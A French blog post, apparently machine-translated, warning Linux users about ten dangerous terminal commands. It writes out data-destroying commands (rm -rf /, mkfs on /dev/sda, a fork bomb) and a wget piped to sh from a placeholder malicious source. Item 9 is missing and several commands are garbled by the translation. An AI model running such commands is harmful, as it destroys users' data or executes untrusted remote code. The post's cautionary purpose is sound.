Rechercher sur ce blogue

vendredi 9 septembre 2016

Les 10 plus dangereuses commandes de Linux OS



 Vous ne devriez jamais exécuter sur votre machine:
Terminal Linux est l'un des programmes les plus puissants sous Linux OS. La ligne de commande sous Linux OS est très productif, utile et intéressant, cependant, il peut parfois être très dangereux, surtout lorsqu'ils traitent racine de l'utilisateur ou de l'utilisateur qui peut prendre la plupart de leurs privilèges, sudo.
Vous devez savoir exactement ce que vous faites. Cet article a été créé pour les utilisateurs de Linux simplement signaler quelques-unes des commandes du terminal, que chaque utilisateur Linux devrait réfléchir à deux fois avant de les exécuter.
Si vous ne savez pas sur Linux et que vous voulez apprendre Linux en ligne lire ce post.LIRE Suivre 10 chaînes YouTube pour apprendre Linux en ligne
Lire la suite attentivement et connaître ces commandes dangereuses linux. Assurez-vous de ne jamais exécuter ces commandes dangereuses Linux dans votre machine Linux.
1. rm -rf
La commande rm -rf / supprime tout ce qu'il peut possible, y compris les fichiers sur votre disque dur et les fichiers sur des périphériques de supports amovibles connectés. Cette commande est plus compréhensible si elle est décomposée:
2 .: () {: |: &};:
: () {: |: &} ;: Également connu sous le nom Fork Bomb est une attaque par déni de service contre un système Linux. : () {: |: &} ;: Est une fonction bash. Une fois exécuté, il se répète plusieurs fois jusqu'à ce que le système se bloque.
Vous ne pouvez vous en débarrasser en redémarrant votre système. Soyez donc prudent lors de l'exécution de cette commande sur votre shell Linux.Commandes Fork
Commandes Fork
Source: Dake sur Wikimedia CommonsLIRE Comment faire pour convertir un chargeur USB dans un ordinateur Linux
3. command> / dev / sda
La commande ci-dessus écrit la sortie de 'commande sur le bloc / dev / sda. La commande ci-dessus écrit les données brutes et tous les fichiers sur le bloc sera remplacé par les données brutes, entraînant la perte totale des données dans le bloc.
4. répertoire mv / dev / null
/ Dev / null est un autre endroit spécial - déplacer quelque chose à / dev / null est la même chose que de le détruire. Pensez à / dev / null comme un trou noir. Essentiellement, mv ~ / dev / null envoie tous vos fichiers personnels dans un trou noir.LIRE Top 10 Meilleur Kali Linux Tutoriels de sécurité pour les débutants
5. http wget: // malicious_source -O | sh
La ligne ci-dessus télécharge un script à partir du Web et l'envoie à sh, qui exécute le contenu du script. Cela peut être dangereux si vous n'êtes pas sûr de ce que le script est ou si vous ne faites pas confiance sa source - ne pas exécuter des scripts non fiables.
6. mkfs.ext3 / dev / sda
La commande ci-dessus va formater le bloc 'sda' et vous serait sûrement savoir que, après l'exécution de la commande ci-dessus votre Block (Hard Disk Drive) serait nouvelle, BRAND NEW! Sans les données, en laissant votre système dans l'étape irrécupérables.LIRE Comment faire pour exécuter Windows 98 ou Linux entièrement dans votre navigateur Chrome
7.> File
La commande ci-dessus est utilisée pour libérer le contenu du fichier. Si la commande ci-dessus est exécutée avec une erreur de frappe ou de l'ignorance comme "> xt.conf" va écrire le fichier de configuration ou tout autre système ou d'un fichier de configuration.
8. ^ foo ^ bar
Cette commande est utilisée pour modifier la commande d'exécution précédente, sans la nécessité de retaper à nouveau l'ensemble de la commande. Mais cela peut vraiment être gênant si vous ne l'avez pas pris le risque de bien vérifier le changement de commande d'origine en utilisant ^ foo ^ commande bar.LIRE Suivre 10 chaînes YouTube pour apprendre Linux en ligne


10. Décompression Bombe
Vous avez reçu un fichier compressé et vous êtes invité à extraire ce fichier qui semble être de très petite taille, mais peut-être un peu KB. En fait, ce petit fichier compressé de taille contient des données très fortement compressées.
Une fois le fichier décompressé, des centaines de Go de données est extrait qui peut remplir votre disque dur pour faire baisser les performances de votre système. Pour éviter cette situation, rappelez-vous toujours d'accepter des données provenant de sources dignes de confiance.10 Most Dangerous Linux OS Commandes Vous ne devriez jamais exécuter sur votre machine

LIRE Top 10 Meilleur Hacking gratuit Outils 2016 pour Windows et Linux


Source.:

Aucun commentaire: